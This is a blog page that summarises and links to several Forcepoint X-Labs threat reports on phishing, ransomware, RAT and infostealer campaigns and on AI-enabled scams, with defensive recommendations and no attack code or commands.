The IT Nerd

Authored by Mayur Sewani, Senior Security Researcher, Forcepoint X-Labs researchers observed:

A campaign in which a spoofed email impersonating the U.S. Social Security Administration delivers a malicious attachment designed for silent execution and privilege escalation. 

The script disables Windows SmartScreen, removes the Mark-of-the-Web, and installs a legitimate ScreenConnect client that is then abused as a Remote Access Trojan (RAT) to maintain command-and-control access. 

Notably, the ScreenConnect client analyzed was signed with a certificate that had been explicitly revoked, underscoring how attackers are leveraging trusted tooling to evade detection. 

The compromised host ultimately establishes encrypted communications with a remote server linked to Iranian network infrastructure, enabling data exfiltration activity. 

Why This Matters

This research highlights a growing defensive challenge: attackers increasingly bypass traditional security controls by modifying system protections and repurposing legitimate IT management software. The findings reinforce the need for organizations to block revoked software, enforce strict RMM allowlists, and monitor for security-control tampering.

You can read the research here: ScreenConnect Attack: SmartScreen Bypass and RMM Abuse

Today, the researchers at Forcepoint X-Labs released findings on a high-volume phishing campaign leveraging the Phorpiex botnet to deliver Global Group ransomware, demonstrating how familiar file types and low-friction attack chains continue to enable high-impact compromises.

Authored by Lydia McElligott, Senior Security Researcher, Forcepoint X-Labs researchers observed the following:

• Weaponized Windows shortcut (.lnk) attachments: Attackers disguise the file as a normal document using double extensions, allowing a single click to trigger code execution. 
• Stealthy multi-stage execution: The shortcut launches command-line tools that download and execute the payload with no visible installer. 
• Offline “mute” ransomware: Global Group operates locally without contacting command-and-control infrastructure and generates encryption keys on the host, enabling execution even in air-gapped environments. 
• No data exfiltration required: The ransomware conducts all activity locally, increasing the likelihood of evading detection strategies that rely on suspicious network traffic. 
• Aggressive anti-forensics: Artifact removal and self-deletion techniques make detection and recovery particularly challenging. 

Bigger Picture

This campaign highlights how long-standing malware families remain effective when paired with reliable phishing techniques, reinforcing the need for organizations to prioritize endpoint behavior monitoring rather than relying solely on network signals. 

Here’s a link to the full findings: https://www.forcepoint.com/blog/x-labs/phorpiex-global-group-ransomware-lnk-phishing. 

Forcepoint has a report that is literally hot off the press that covers something that I have personally experienced today.

With holiday financial stress peaking, Forcepoint has uncovered a sophisticated two-pronged scam campaign. Scammers are now pairing Docusign-themed phishing to hijack corporate credentials with convincing loan offer spam designed for identity theft.

The first threat uses spoofed ‘wine order’ documents to lure employees into entering logins on fake pages. Simultaneously, ‘Christmas Cheer Cash’ lures use professional marketing layouts to walk victims through a ‘loan application’ that harvests SSNs and bank details. I have received phishing emails matching the description of the first threat. These attacks are effective because they mimic standard end-of-year workflows.

You can get more details here: https://www.forcepoint.com/blog/x-labs/docusign-phishing-holiday-loan-spam

Here’s a timely piece of research just published by Forcepoint’s X-Labs team and authored by Lydia McElligott, Security Researcher, titled “How AI is Fueling a New Wave of Black Friday Scams” 

Given the upcoming holiday sales surge, this one (with a number of visual examples included) hits at the intersection of cybersecurity, retail behavior and the AI threat landscape.

Three key take-aways from the research:

• AI is raising the stakes. Scams this year don’t look like the old “cheap deal” bait—they’re polished, coherent and realistic: phishing emails that mirror brand templates, cloned retail websites spun up in minutes, fake social-media ads. 
• Trusted brands are primary targets. Attackers are leveraging familiarity with brands like Amazon, Temu and luxury labels to build trust and urgency in their scams. 
• Defensive behaviours still work—but they require discipline. The article outlines actionable red flags: inspecting sender domains, hovering rather than clicking links, really questioning “too-good-to-be-true” discounts and using secure payment methods. 

The post is at: https://www.forcepoint.com/blog/x-labs/black-friday-scams-ai-phishing-guide

 Forcepoint X-Labs has released a new post by researcher Jyotika Singh, which is a deep dive into the accelerating AI Cybersecurity Arms Race. The post details how artificial intelligence is simultaneously empowering defenders with real-time detection while helping adversaries automate deception at massive scale. The central finding is that every algorithm built for protection can now be turned to exploit, making speed and continuous adaptation the only sustainable advantages.  This analysis highlights that the challenge for security leaders is no longer whether to use AI, but how to stay ahead of sophisticated, AI-enabled adversaries.

Key highlights from the research include:

• Adversaries are leveraging malicious LLM variants (such as FraudGPT and WormGPT) to automate phishing kit creation, malware generation, and massively scale social engineering operations. 
• Deepfake technology has fully graduated from theory to multi-million-dollar real-world fraud, exemplified by a confirmed £20M video-call scam that impersonated company officers for a fraudulent transfer. 
• Attackers are using Reinforcement Learning (RL) to train generative models to automatically evolve polymorphic payloads, creating malware that changes structure to evade endpoint security products. 
• Defenders are fighting back with multi-layered ML/DNN classifiers and ‘Agentic AI’ systems, cutting average dwell time by automating real-time threat detection and high-volume tasks like alert triage. 
• Actionable recommendations for organizations, including enforcing out-of-band verification for high-value transfers and continuously red-teaming internal ML models against adversarial inputs.

This research reinforces that the future of cybersecurity will be decided by who adapts the fastest, and that human oversight paired with intelligent automation is critical to maintaining confidence in protection.

The full blog post can be found at https://www.forcepoint.com/blog/x-labs/ai-cybersecurity-arms-race

This morning, the researchers at Forcepoint X-Labs have released new findings confirming that in Q3, organizations across industries have seen a steep increase in JavaScript-attachment-based campaigns that deliver a variety of information-stealing and RAT malware, such as DarkCloud, Remcos, Agent Tesla, and Formbook.

Authored by Senior Security Researcher Mayur Sewani, the post discusses (with supporting images and code) how attackers are cloaking their lures in everyday business communications with fake quotes, purchase orders, shipment alerts and even WeTransfer-style links to slip past conventional filters and take advantage of recipient’s trust. For this analysis, the X-labs team reviewed thousands of email subject lines and found similar social engineering tactics being used repeatedly.

These scripts act as downloaders, using PowerShell and steganography to deliver .NET-based RATs and Infostealers. Advanced obfuscation, sandbox evasion, and process hollowing highlight the increasing sophistication of these attacks. 

Sewani recommends that organizations combine advanced email filtering, endpoint protection, and user awareness to mitigate these threats.

The full post can be found at: https://www.forcepoint.com/blog/x-labs/q3-2025-threat-brief-obfuscated-javascript-steganography

This morning, the researchers from Forcepoint X-Labs have released a new blog post detailing a new way attackers are using shellcode as an enabling technology for modern remote access trojan campaigns — and an old technique with a new infection. The example in the post injects the XWorm RAT.

Campaign Highlights:

The campaign is delivered by phishing email, using a fake invoice as a lure. Sequence:

• The email has an Office file (.xlam) attachment, which, on downloading and opening, shows a blank or corrupted Office file. 
• This malicious document has an embedded oleObject1.bin file, which hides embedded shellcode. 
• The shellcode, when executed, initiates connection to retrieve and deploy secondary payload.
• The second payload, which was an executable, was found to be a .NET binary that reflectively loaded into the memory.
• The second stage .DLL file from memory uses heavily obfuscated packing and encryption techniques.
• The next and final step performs a process injection in its own main executable file, maintaining persistence and exfiltrating data to its Command & Control servers. 
• The C2s where data was exfiltrated was found to be related to XWorm family.

Authored by Prashant Kumar, senior research at Forcepoint, the full post with detailed illustrated example with images can be found at: https://www.forcepoint.com/blog/x-labs/xworm-rat-shellcode-multi-stage-analysis